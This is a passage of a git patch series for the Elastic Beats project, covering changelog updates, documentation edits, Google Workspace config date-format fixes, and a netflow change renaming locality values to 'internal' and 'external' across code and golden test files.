From 48722e518e67f0320b29def543694a9d29b3228f Mon Sep 17 00:00:00 2001 From: Andres Rodriguez Date: Fri, 19 Mar 2021 17:25:04 +0100 Subject: [PATCH 01/20] Forward-port 7.11.2 changelog to 7.x (#24450) (#24655) * docs: Prepare Changelog for 7.11.2 (#24437) * docs: Close changelog for 7.11.2 * Remove empty sections. Fix breaking change entry Co-authored-by: Andres Rodriguez (cherry picked from commit 01930e9f9b09c281bf3798e9c477e8f40770f243) * Fix changelog.next Co-authored-by: Elastic Machine (cherry picked from commit 79b941a737494dfb3abfed525d9e9253340c13a6) --- CHANGELOG.asciidoc | 20 ++++++++++++++++++++ CHANGELOG.next.asciidoc | 5 +---- libbeat/docs/release.asciidoc | 1 + 3 files changed, 22 insertions(+), 4 deletions(-) diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 0d1ea0d2ebee..51c0f1f8aea3 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,26 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.11.2]] +=== Beats version 7.11.2 +https://github.com/elastic/beats/compare/v7.11.1...v7.11.2[View commits] + +==== Bugfixes + +*Affecting all Beats* + +- Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] + +*Filebeat* + +- Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] +- Fix aws/vpcflow generating errors for empty logs or unidentified formats. {pull}24167[24167] +- Add `nodes` to filebeat-kubernetes.yaml ClusterRole. {issue}24051[24051] {pull}24052[24052] + +*Metricbeat* + +- Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] + [[release-notes-7.11.1]] === Beats version 7.11.1 https://github.com/elastic/beats/compare/v7.11.0...v7.11.1[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index eda9e956a018..a4c6df454a05 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -48,7 +48,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] - Rename `s3` input to `aws-s3` input. {pull}23469[23469] -- Add `nodes` to filebeat-kubernetes.yaml ClusterRole. {issue}24051[24051] {pull}24052[24052] *Heartbeat* - Adds negative body match. {pull}20728[20728] @@ -145,6 +144,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] - Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] - Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] +- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] *Auditbeat* @@ -245,11 +245,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] - Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] - Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] -- Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] - Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] - aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] - Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] -- Fix aws/vpcflow generating errors for empty logs or unidentified formats. {pull}24167[24167] - Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] - in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] - Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] @@ -326,7 +324,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] - Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] -- Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] - Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] - Unskip s3_request integration test. {pull}23887[23887] - Add system.hostfs configuration option for system module. {pull}23831[23831] diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index b84a4aa0ae91..7c6f3aa2a164 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> From 3bf2586c2ddbf48b3c3964f6ebfd7096c60ec0c2 Mon Sep 17 00:00:00 2001 From: DeDe Morton Date: Fri, 19 Mar 2021 12:52:40 -0700 Subject: [PATCH 02/20] Add breaking changes for 7.12 (#24646) (#24658) --- .../breaking/breaking-7.12.asciidoc | 18 ++++++++++++++++++ .../release-notes/breaking/breaking.asciidoc | 5 +++++ 2 files changed, 23 insertions(+) create mode 100644 libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc diff --git a/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc new file mode 100644 index 000000000000..a5ef7e4929eb --- /dev/null +++ b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc @@ -0,0 +1,18 @@ +[[breaking-changes-7.12]] + +=== Breaking changes in 7.12 +++++ +7.12 +++++ + +//NOTE: The notable-breaking-changes tagged regions are re-used in the +//Installation and Upgrade Guide + +// tag::notable-breaking-changes[] + +No breaking changes. + +// end::notable-breaking-changes[] + +See the <> for a complete list of changes, +including changes to beta or experimental functionality. diff --git a/libbeat/docs/release-notes/breaking/breaking.asciidoc b/libbeat/docs/release-notes/breaking/breaking.asciidoc index 916b4670802f..8f10c73a7820 100644 --- a/libbeat/docs/release-notes/breaking/breaking.asciidoc +++ b/libbeat/docs/release-notes/breaking/breaking.asciidoc @@ -11,6 +11,8 @@ changes, but there are breaking changes between major versions (e.g. 6.x to See the following topics for a description of breaking changes: +* <> + * <> * <> @@ -35,6 +37,9 @@ See the following topics for a description of breaking changes: * <> + +include::breaking-7.12.asciidoc[] + include::breaking-7.11.asciidoc[] include::breaking-7.10.asciidoc[] From 4502e2ababdc0cb0d69bb874aee1d59bde324ccd Mon Sep 17 00:00:00 2001 From: Adrian Serrano Date: Sun, 21 Mar 2021 20:09:17 +0100 Subject: [PATCH 03/20] [ILM][Docs] Clarify how to change setup.ilm.pattern (#24129) (#24396) * ILM: Clarify docs about setup.ilm.pattern * address review comments (cherry picked from commit f3dda90b0458cf57d5556ad1f728bc5c00e4e633) Co-authored-by: DeDe Morton --- libbeat/docs/shared-ilm.asciidoc | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/libbeat/docs/shared-ilm.asciidoc b/libbeat/docs/shared-ilm.asciidoc index 3502596e1434..759660fe71f2 100644 --- a/libbeat/docs/shared-ilm.asciidoc +++ b/libbeat/docs/shared-ilm.asciidoc @@ -79,8 +79,10 @@ For more information, see {ref}/indices-rollover-index.html#_using_date_math_with_the_rollover_api[Using date math with the rollover API]. -NOTE: If you modify this setting after loading the index template, you must -overwrite the template to apply the changes. +NOTE: Before modifying this setting for an existing ILM setup, you must manually +remove any aliases related to the previous pattern, then overwrite the policy. +Existing indices that don't match the new pattern might no longer be subject to +index lifecycle management. [float] [[setup-ilm-policy_name-option]] From ba56e34727bba215f963fe16a8ff828bf65e7ae6 Mon Sep 17 00:00:00 2001 From: Marc Guasch Date: Mon, 22 Mar 2021 15:04:46 +0100 Subject: [PATCH 04/20] Fix Google Workspace cursor date parsing (#24668) (#24671) (cherry picked from commit 7964c23e7460315a67d23114d85b3169a36d7675) --- CHANGELOG.next.asciidoc | 2 ++ .../filebeat/module/google_workspace/admin/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/drive/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/groups/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/login/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/saml/config/config.yml | 4 ++-- .../module/google_workspace/user_accounts/config/config.yml | 4 ++-- 7 files changed, 14 insertions(+), 12 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index a4c6df454a05..18919d56ed14 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -251,6 +251,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] - in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] - Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] +- Fix Cisco ASA parser for message 722051. {pull}24410[24410] +- Fix `google_workspace` pagination. {pull}24668[24668] *Heartbeat* diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index 8c2c3824ed7e..1b992f50d132 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index 18eacfef7a20..e88aecca5280 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index 6d713ebdb29b..d40347b89fbc 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index 3ce48abe77bc..6f1249bd1950 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index da0641282fcf..d69484c939fe 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 2219d3ba1a0d..f67eb4208331 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log From 98a5f97321ab44e49e40623afd22543e2e40d6ab Mon Sep 17 00:00:00 2001 From: Adrian Serrano Date: Mon, 22 Mar 2021 16:26:11 +0100 Subject: [PATCH 05/20] netflow: Use internal and external for locality fields (#24295) (#24461) Changes netflow input to use internal and external for locality fields: - source.locality - destination.locality - flow.locality Previously it was using public and private. Fixes #24272 (cherry picked from commit 0c6acc9253830e57cc3ce9b81fe74799a30a1e6d) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/input/netflow/convert.go | 18 +- ...-extended-uniflow-template-256.golden.json | 12 +- .../IPFIX-Barracuda-firewall.golden.json | 48 ++--- ...IPFIX-Mikrotik-RouterOS-6.39.2.golden.json | 204 +++++++++--------- ...er-with-variable-length-fields.golden.json | 18 +- .../golden/IPFIX-Nokia-BRAS.golden.json | 6 +- .../golden/IPFIX-OpenBSD-pflow.golden.json | 156 +++++++------- .../testdata/golden/IPFIX-Procera.golden.json | 48 ++--- ...are-virtual-distributed-switch.golden.json | 26 +-- .../IPFIX-YAF-basic-with-applabel.golden.json | 12 +- ...igured-with-include_flowset_id.golden.json | 18 +- .../IPFIX-vIPtela-with-VPN-id.golden.json | 6 +- .../netflow/testdata/golden/IPFIX.golden.json | 72 +++---- ...w-9-Cisco-1941-K9-release-15.1.golden.json | 174 +++++++-------- .../golden/Netflow-9-Cisco-ASA-2.golden.json | 114 +++++----- .../golden/Netflow-9-Cisco-ASA.golden.json | 84 ++++---- ...o-ASR-9000-series-template-260.golden.json | 126 +++++------ .../Netflow-9-Cisco-ASR1001--X.golden.json | 150 ++++++------- ...tflow-9-Cisco-NBAR-flowset-262.golden.json | 30 +-- .../golden/Netflow-9-Cisco-WLC.golden.json | 76 +++---- ...flow-9-Fortigate-FortiOS-5.2.1.golden.json | 6 +- ...-9-Fortigate-FortiOS-54x-appid.golden.json | 102 ++++----- ...9-H3C-Netstream-with-varstring.golden.json | 6 +- .../testdata/golden/Netflow-9-H3C.golden.json | 96 ++++----- .../Netflow-9-Huawei-Netstream.golden.json | 6 +- .../golden/Netflow-9-IE150-IE151.golden.json | 12 +- ...et-in-large-zero-filled-packet.golden.json | 6 +- ...Palo-Alto-PAN--OS-with-app--id.golden.json | 48 ++--- .../golden/Netflow-9-Streamcore.golden.json | 24 +-- ...ti-Edgerouter-with-MPLS-labels.golden.json | 96 ++++----- ...etflow-9-field-layer2segmentid.golden.json | 6 +- ..._netflow-reduced-size-encoding.golden.json | 72 +++---- .../golden/Netflow-9-macaddress.golden.json | 174 +++++++-------- ...w-9-multiple-netflow-exporters.golden.json | 44 ++-- .../Netflow-9-nprobe-DPI-L7.golden.json | 6 +- ...-template-with-0-length-fields.golden.json | 60 +++--- .../golden/Netflow-9-valid-01.golden.json | 38 ++-- .../golden/ipfix_cisco.pcap.golden.json | 58 ++--- ...netflow9_e10s_4_7byte_pad.pcap.golden.json | 36 ++-- ...flow9_ubiquiti_edgerouter.pcap.golden.json | 60 +++--- 41 files changed, 1180 insertions(+), 1175 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 18919d56ed14..1b2ea44d6ed6 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -48,6 +48,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] - Rename `s3` input to `aws-s3` input. {pull}23469[23469] +- Possible values for Netflow's locality fields (source.locality, destination.locality and flow.locality) are now `internal` and `external`, instead of `private` and `public`. {issue}24272[24272] {pull}24295[24295] *Heartbeat* - Adds negative body match. {pull}20728[20728] diff --git a/x-pack/filebeat/input/netflow/convert.go b/x-pack/filebeat/input/netflow/convert.go index 67053b4e6808..465cd3efd021 100644 --- a/x-pack/filebeat/input/netflow/convert.go +++ b/x-pack/filebeat/input/netflow/convert.go @@ -375,16 +375,20 @@ func fixMacAddresses(dict map[string]interface{}) { } } +// Locality is an enum representing the locality of a network address. type Locality uint8 const ( - LocalityPrivate Locality = iota + 1 - LocalityPublic + // LocalityInternal identifies addresses that are internal to the organization. + LocalityInternal Locality = iota + 1 + + // LocalityExternal identifies addresses that are outside of the organization. + LocalityExternal ) var localityNames = map[Locality]string{ - LocalityPrivate: "private", - LocalityPublic: "public", + LocalityInternal: "internal", + LocalityExternal: "external", } func (l Locality) String() string { @@ -408,14 +412,14 @@ func getIPLocality(internalNetworks []string, ips ...net.IP) Locality { for _, ip := range ips { contains, err := conditions.NetworkContains(ip, internalNetworks...) if err != nil { - return LocalityPublic + return LocalityExternal } // always consider loopback/link-local private if !contains && !isLocal(ip) { - return LocalityPublic + return LocalityExternal } } - return LocalityPrivate + return LocalityInternal } // TODO: create table from https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json index 5a806ce7b058..fbc2f5e3d2ab 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "64.235.151.76", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -24,7 +24,7 @@ }, "flow": { "id": "kSpZ1WuBhjc", - "locality": "public" + "locality": "external" }, "netflow": { "audit_counter": 4157725, @@ -84,7 +84,7 @@ "source": { "bytes": 0, "ip": "10.236.5.4", - "locality": "private", + "locality": "internal", "mac": "00:50:56:b9:26:46", "packets": 0, "port": 51917 @@ -99,7 +99,7 @@ "Fields": { "destination": { "ip": "10.236.5.4", - "locality": "private", + "locality": "internal", "port": 51917 }, "event": { @@ -116,7 +116,7 @@ }, "flow": { "id": "kSpZ1WuBhjc", - "locality": "public" + "locality": "external" }, "netflow": { "audit_counter": 4157725, @@ -176,7 +176,7 @@ "source": { "bytes": 0, "ip": "64.235.151.76", - "locality": "public", + "locality": "external", "mac": "00:00:00:00:00:00", "packets": 0, "port": 443 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json index 7a4aa57c8037..ec4f36b10faf 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.99.252.50", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -24,7 +24,7 @@ }, "flow": { "id": "2vFIarATx_4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.252.50", @@ -72,7 +72,7 @@ "source": { "bytes": 0, "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 65105 @@ -87,7 +87,7 @@ "Fields": { "destination": { "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "port": 65105 }, "event": { @@ -104,7 +104,7 @@ }, "flow": { "id": "2vFIarATx_4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.130.239", @@ -152,7 +152,7 @@ "source": { "bytes": 81, "ip": "10.99.252.50", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 @@ -167,7 +167,7 @@ "Fields": { "destination": { "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -184,7 +184,7 @@ }, "flow": { "id": "wU3G8idsscw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.98.243.20", @@ -232,7 +232,7 @@ "source": { "bytes": 0, "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 65105 @@ -247,7 +247,7 @@ "Fields": { "destination": { "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "port": 65105 }, "event": { @@ -264,7 +264,7 @@ }, "flow": { "id": "wU3G8idsscw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.130.239", @@ -312,7 +312,7 @@ "source": { "bytes": 81, "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 @@ -327,7 +327,7 @@ "Fields": { "destination": { "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -344,7 +344,7 @@ }, "flow": { "id": "rOmj8EdZ2dc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.98.243.20", @@ -392,7 +392,7 @@ "source": { "bytes": 0, "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 52344 @@ -407,7 +407,7 @@ "Fields": { "destination": { "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "port": 52344 }, "event": { @@ -424,7 +424,7 @@ }, "flow": { "id": "rOmj8EdZ2dc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.168.140", @@ -472,7 +472,7 @@ "source": { "bytes": 113, "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 @@ -487,7 +487,7 @@ "Fields": { "destination": { "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -504,7 +504,7 @@ }, "flow": { "id": "JE7pThaMwJY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.98.243.20", @@ -552,7 +552,7 @@ "source": { "bytes": 0, "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 50294 @@ -567,7 +567,7 @@ "Fields": { "destination": { "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "port": 50294 }, "event": { @@ -584,7 +584,7 @@ }, "flow": { "id": "JE7pThaMwJY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.168.140", @@ -632,7 +632,7 @@ "source": { "bytes": 113, "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json index 81b36a93d3ac..36fea0d68e1f 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.128.17", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "1SREAwMSn_Y", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.128.17", @@ -71,7 +71,7 @@ "source": { "bytes": 152, "ip": "10.10.8.197", - "locality": "private", + "locality": "internal", "packets": 2, "port": 123 } @@ -85,7 +85,7 @@ "Fields": { "destination": { "ip": "192.168.230.216", - "locality": "private", + "locality": "internal", "port": 82 }, "event": { @@ -101,7 +101,7 @@ }, "flow": { "id": "-1ecQ0Y-YzY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.230.216", @@ -149,7 +149,7 @@ "source": { "bytes": 502, "ip": "192.168.35.143", - "locality": "private", + "locality": "internal", "packets": 8, "port": 46518 } @@ -163,7 +163,7 @@ "Fields": { "destination": { "ip": "192.168.35.143", - "locality": "private", + "locality": "internal", "port": 46518 }, "event": { @@ -179,7 +179,7 @@ }, "flow": { "id": "_ztnBsqvzw4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.35.143", @@ -227,7 +227,7 @@ "source": { "bytes": 2233, "ip": "10.10.6.11", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -241,7 +241,7 @@ "Fields": { "destination": { "ip": "192.168.230.216", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -257,7 +257,7 @@ }, "flow": { "id": "83jerlRbQig", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.230.216", @@ -305,7 +305,7 @@ "source": { "bytes": 152, "ip": "192.168.128.17", - "locality": "private", + "locality": "internal", "packets": 2, "port": 123 } @@ -319,7 +319,7 @@ "Fields": { "destination": { "ip": "172.20.5.191", - "locality": "private", + "locality": "internal", "port": 42502 }, "event": { @@ -335,7 +335,7 @@ }, "flow": { "id": "r6DcuKSlKG8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.5.191", @@ -383,7 +383,7 @@ "source": { "bytes": 79724, "ip": "10.10.8.220", - "locality": "private", + "locality": "internal", "packets": 57, "port": 80 } @@ -397,7 +397,7 @@ "Fields": { "destination": { "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -413,7 +413,7 @@ }, "flow": { "id": "MJV4se1d1EY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.1", @@ -461,7 +461,7 @@ "source": { "bytes": 161, "ip": "172.20.4.199", - "locality": "private", + "locality": "internal", "packets": 3, "port": 10240 } @@ -475,7 +475,7 @@ "Fields": { "destination": { "ip": "172.20.4.199", - "locality": "private", + "locality": "internal", "port": 10240 }, "event": { @@ -491,7 +491,7 @@ }, "flow": { "id": "MJV4se1d1EY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.199", @@ -539,7 +539,7 @@ "source": { "bytes": 245, "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 53 } @@ -553,7 +553,7 @@ "Fields": { "destination": { "ip": "10.10.8.34", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -569,7 +569,7 @@ }, "flow": { "id": "Md4y9RxWsu0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.10.8.34", @@ -617,7 +617,7 @@ "source": { "bytes": 504, "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "packets": 6, "port": 0 } @@ -631,7 +631,7 @@ "Fields": { "destination": { "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "port": 59571 }, "event": { @@ -647,7 +647,7 @@ }, "flow": { "id": "_XZysP4InTc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.30", @@ -695,7 +695,7 @@ "source": { "bytes": 784, "ip": "10.10.8.105", - "locality": "private", + "locality": "internal", "packets": 6, "port": 22 } @@ -709,7 +709,7 @@ "Fields": { "destination": { "ip": "10.10.8.105", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -725,7 +725,7 @@ }, "flow": { "id": "_XZysP4InTc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.10.8.105", @@ -773,7 +773,7 @@ "source": { "bytes": 433, "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "packets": 8, "port": 59571 } @@ -787,7 +787,7 @@ "Fields": { "destination": { "ip": "192.168.183.199", - "locality": "private", + "locality": "internal", "port": 6667 }, "event": { @@ -803,7 +803,7 @@ }, "flow": { "id": "5stvUzTWY8c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.183.199", @@ -851,7 +851,7 @@ "source": { "bytes": 196, "ip": "10.10.7.11", - "locality": "private", + "locality": 